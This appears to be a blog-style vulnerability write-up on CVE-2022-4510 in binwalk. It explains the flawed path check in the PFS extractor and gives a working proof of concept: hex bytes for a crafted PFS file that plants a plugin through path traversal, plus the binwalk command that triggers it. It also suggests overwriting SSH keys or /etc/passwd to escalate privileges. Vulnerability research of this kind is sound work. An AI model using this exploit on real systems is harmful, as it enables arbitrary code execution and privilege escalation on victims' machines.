Binwalk Remote Command Execution Vulnerability Principle and Demonstration CVE-2022-4510

Introduction

According to the official cve description, a path traversal vulnerability was found in binwalk from version 2.1.2 to 2.3.3. This vulnerability allows a remote attacker to execute arbitrary code on an affected machine with binwalk installed

What is a PFS file

A PFS file is a selection file created by PhotoFiltre Studio, an image retouching program. It contains the coordinates used by the image editor's polygon selection tool to draw lines between the given coordinates. PFS files are stored in plain text.

PFS file format

https://lekensteyn.nl/files/pfs/pfs.txt

Analyze source code

A PFS extractor plugin was merged into binwalk in 2017 with some modifications

     def extractor(self, fname):
         fname = os.path.abspath(fname)
         out_dir = binwalk.core.common.unique_file_name(os.path.join(os.path.dirname(fname), "pfs-root"))

         try:
             with PFS(fname) as fs:  #读取pfs文件数据
               data = open(fname, 'rb')
               data = binwalk.core.common.BlockFile(fname, 'rb')
               data.seek(fs.get_end_of_meta_data())
               for entry in fs.entries():
                   outfile_path = os.path.join(out_dir, entry.fname)
                   if not outfile_path.startswith(out_dir): 
                        binwalk.core.common.warning("Unpfs extractor detected directory traversal attempt for file: '%s'. Refusing to extract." % outfile_path)
                    else:
                        self._create_dir_from_fname(outfile_path)
                        outfile = binwalk.core.common.BlockFile(outfile_path, 'wb')
                        outfile.write(data.read(entry.fsize))
                        outfile.close()
                 data.close()
         except KeyboardInterrupt as e:
             raise e

The problem occurs in the os.path.join function, because the code on line 11 does not fully resolve the path, so the condition on line 12 will never be true

By making a path-traversal PFS file we can force binwalk to write files outside of the directory

POC

Users can use the binwalk API to define their own plugins, just put the plugins in the $HOME/.config/binwalk/plugins/ directory, and then the plugins will be called when binwalk is run

Malicious code:

import binwalk.core.plugin

class MaliciousExtractor(binwalk.core.plugin.Plugin):
    def init(self):
        print("baimao")

Open the file with winhex after saving

Paste the following hexadecimal data directly

5046 532f 302e 3900 0000 0000 0000 0100
2e2e 2f2e 2e2f 2e2e 2f2e 636f 6e66 6967
2f62 696e 7761 6c6b 2f70 6c75 6769 6e73
2f6d 616c 7761 6c6b 2e70 7900 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
3412 0000 a000 0000 c100 0000

Save the .py as a .pfs file and add it to the compressed package

When using binwalk to extract files from the user's home directory, a plugin will be added to .config/binwalk/plugins, and this malicious plugin will then be loaded and executed by binwalk, resulting in RCE

cd ~
binwalk -M -e exp.zip

successfully executed code

Summarize

The details of the cve were disclosed on January 31 this year. After studying it, in addition to overwriting the ./.config/binwalk/plugins/malwalk.py file, we can also overwrite the id.rsa or /etc/passwd file to directly escalate rights

Reference documents:

https://nvd.nist.gov/vuln/detail/CVE-2022-4510
https://onekey.com/blog/security-advisory-remote-command-execution-in-binwalk